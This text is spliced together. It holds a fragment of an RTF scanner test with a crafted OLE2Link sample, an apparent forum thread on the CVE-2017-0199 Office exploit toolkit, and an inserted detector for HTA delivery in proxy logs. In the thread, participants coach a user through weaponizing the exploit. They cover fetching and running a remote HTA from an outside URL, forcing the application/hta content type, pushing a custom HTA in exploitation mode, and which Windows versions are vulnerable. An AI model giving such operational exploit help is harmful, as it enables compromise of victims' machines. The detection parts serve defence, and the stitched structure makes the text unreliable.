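    b"{\\rtf1\\ansi Quarterly report\\par\n"
    b"{\\object\\objautlink\\objupdate\\objw1\\objh1{\\*\\objclass Word.Document.8}"
    + _objdata_group(b"\x01\x05\x00\x00\x02\x00\x00\x00" + STDOLELINK_CLSID
                     + b"OLE2Link" + b"\x00" * 8)
    + b"{\\result{\\pict\\wmetafile8 00}}}}"
)
BENIGN_RTF = (
    b"{\\rtf1\\ansi Attached file\\par\n"
    b"{\\object\\objemb\\objw1\\objh1{\\*\\objclass Package}"
    + _objdata_group(b"\x01\x05\x00\x00\x02\x00\x00\x00Package\x00")
    + b"{\\result{\\pict\\wmetafile8 00}}}}"
)

if __name__ == "__main__":
    for name, doc in (("suspicious", SUSPICIOUS_RTF), ("benign", BENIGN_RTF)):
        for finding in scan_rtf(doc):
            print(name, finding)
```

The brace walker treats `\{` and `\}` as literal characters, so escaped braces inside text runs do not throw off the group boundaries; it does not handle `\bin` binary runs, which a production scanner would need to skip by length.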
I really appreciate your time bro, this is what I have done:
https://2.lithi.io/qDoxsQ5.png https://2.lithi.io/z8WFm.png https://2.lithi.io/oXANtQ.png https://2.lithi.io/YyMnq.png
But I am getting an error at the end of execution, kindly advise what I am missing.
Oh, lest I forget, tested on Windows 7 32-bit with MS Word 2007 and also Windows 8 with MS Word 2010 32-bit.
If some of you are having difficulty reproducing the observation in Win7, you are likely using a fresh Win7, see https://www.youtube.com/watch?v=ac6LM7WAx64
I noted @nixawk's observation regarding the registry key, but it seems like a fresh Win7, regardless of SP1 or not, is not vulnerable. By "fresh", I mean hardly any patches installed. See the video for yourself. The VM that has the black background also has reg_sz:ole32.dll for that registry key but was able to pop a calculator.
Saw the video, but this was tested against Windows 7 32-bit VMware and Windows 8 32-bit VMware. Does this also affect Windows 8 and Windows Server 2008? I only got a pop-up warning but the file was not executed.
@hostbob, looks like the document was generated properly.
As per the instructions, once the document is opened it will request http://2.lithi.io/5LjNsE.HTA and try to execute it.
Please share what is not working here. Are you not receiving the "https://2.lithi.io/5LjNsE.HTA" request from the target once the document is opened, or is the HTA not getting executed after delivery? It seems "https://2.lithi.io/5LjNsE.HTA" is not delivering the toolkit's HTA, which is tested and working fine.
If you want to use a custom HTA, please make sure it is getting executed and not having any errors.
I recommend pointing "https://2.lithi.io/5LjNsE.HTA" to the machine where the tool is running and starting the toolkit in exploitation mode (-M exp) with the required parameters.
For this, you could follow steps 2 and 3 specified in the README.md or listed at https://github.com/bhdresh/CVE-2017-0199
Thanks a lot.
Regards, -Bhadresh
@hostbob,
@bhdresh asked good questions. Try with a simple test case first, e.g. the launch-calculator HTA script that was shared earlier in this thread. If that works, then it has something to do with the custom HTA.
If even the simple test case doesn't work, check that the web server hosting the HTA file is forcing Content-Type to application/hta, otherwise the HTA would just be rendered in the linked object.
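The Content-Type point above is also the most useful thing to watch for on the network: a response served as application/hta is handed to the HTA host and run, while the same .hta URL served as text/html is only rendered inside the linked object, which is the "black screen, no callback" symptom several posters describe. The snippet below is an added detection example, not code from this thread or any of the linked toolkits. It parses a constructed proxy log layout (an assumption, not any product's real format), flags application/hta responses, raises the severity when the client user agent carries the "ms-office" token (assumed here as the marker of an Office URL fetch; not something stated in this thread), and notes .hta URLs delivered with some other type at low severity. The host in the sample lines is a documentation-range address; the path is the one quoted in the thread.

```python
import re
from urllib.parse import urlsplit

# Constructed log layout (an assumption, not any proxy's real format):
#   <client> <method> <url> <status> <response content-type> "<user-agent>"
LINE = re.compile(
    r'^(?P<client>\S+) (?P<method>\S+) (?P<url>\S+) (?P<status>\d{3}) '
    r'(?P<ctype>\S+) "(?P<ua>[^"]*)"$'
)

# Constructed sample lines. 203.0.113.9 is a documentation-range address; the
# "ms-office" user-agent token is an assumption, not taken from this thread.
SAMPLE_LOG = """\
10.0.0.5 GET http://intranet.example/report.docx 200 application/vnd.ms-word "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; ms-office; MSOffice 14)"
10.0.0.5 GET http://203.0.113.9/5LjNsE.HTA 200 application/hta "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; ms-office; MSOffice 14)"
10.0.0.7 GET http://203.0.113.9/5LjNsE.HTA 200 text/html "Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko"
10.0.0.8 GET http://www.example.com/index.html 200 text/html "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
"""


def classify(record: dict):
    """Return (severity, reason) for one parsed record, or None if unremarkable."""
    ctype = record["ctype"].split(";")[0].strip().lower()
    path = urlsplit(record["url"]).path.lower()
    from_office = "ms-office" in record["ua"].lower()   # assumed Office marker
    if ctype == "application/hta":
        # Served as application/hta the body is executed by the HTA host; when
        # the fetch comes from Office that is the chain this thread describes.
        return ("high" if from_office else "medium",
                "response served as application/hta")
    if path.endswith(".hta"):
        # An .hta URL served with any other type is rendered, not executed,
        # which matches the "blank/black screen" reports above.
        return ("low", f".hta URL served as {ctype}")
    return None


def scan_log(text: str) -> list:
    """Parse every well-formed line and return the alerts classify() raises."""
    alerts = []
    for line in text.splitlines():
        m = LINE.match(line)
        if not m:
            continue                     # unparseable line: skip, do not crash
        record = m.groupdict()
        verdict = classify(record)
        if verdict:
            alerts.append({"client": record["client"], "url": record["url"],
                           "severity": verdict[0], "reason": verdict[1]})
    return alerts


if __name__ == "__main__":
    for alert in scan_log(SAMPLE_LOG):
        print(alert)
```

Running it over the sample prints one high-severity alert for the Office client that received an application/hta body and one low-severity note for the client that fetched the same path as text/html.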
@jymcheong , thank you :)
@hostbob, just follow the instructions provided in the guide at https://github.com/bhdresh/CVE-2017-0199. The toolkit can act as an HTA + web server, so just point the HTA URL you are including in the RTF to the toolkit port in exploitation mode and it's done :)
Please feel free to ask if you have any question or issue.
Regards, -Bhadresh
OK, I am gonna admit I am dumb and can't seem to get this. I do not know what I am really missing. @bhdresh can you please inbox me your email or IM ID at edwardmoa@mail.ru? Maybe an instant chat will solve this.
Thank you @jymcheong for your contribution as well
@hostbob, no issues buddy, I sent you an email :)
@bhdresh I think you are busy. Is anyone else still interested in helping out with this? I am using a custom HTA file. What I do not understand is: can this exploit work without using the Metasploit thing, and is it only HTA files it can work with? Kindly share your ideas brothers, I would love to see myself succeed in testing this. I hate trying to test something and seeing myself not getting it :D
@hostbob, I am updating the Python script at https://github.com/bhdresh/CVE-2017-0199 to push a custom HTA.
Usage: python cve-2017-0199.py -M exp -H custom.hta
Hope this will help.
You have been really helpful @bhdresh, I really appreciate your help from the start. When do you think it will be done?
Please try the beta version from https://github.com/bhdresh/CVE-2017-0199/blob/v2.0-beta-3/cve-2017-0199_toolkit.py
Just a side note: you will need to have Internet Explorer 10 installed for the exploit to work under (a fresh) Windows 7.
How about Windows 8, 8.1 and 10, both 32- and 64-bit? Does it require this as well?
As far as I know Windows 8 already comes with Internet Explorer 10 preinstalled, so I guess you don't need to do anything there, but I have not tried it. If you do, please share the results with us too. :)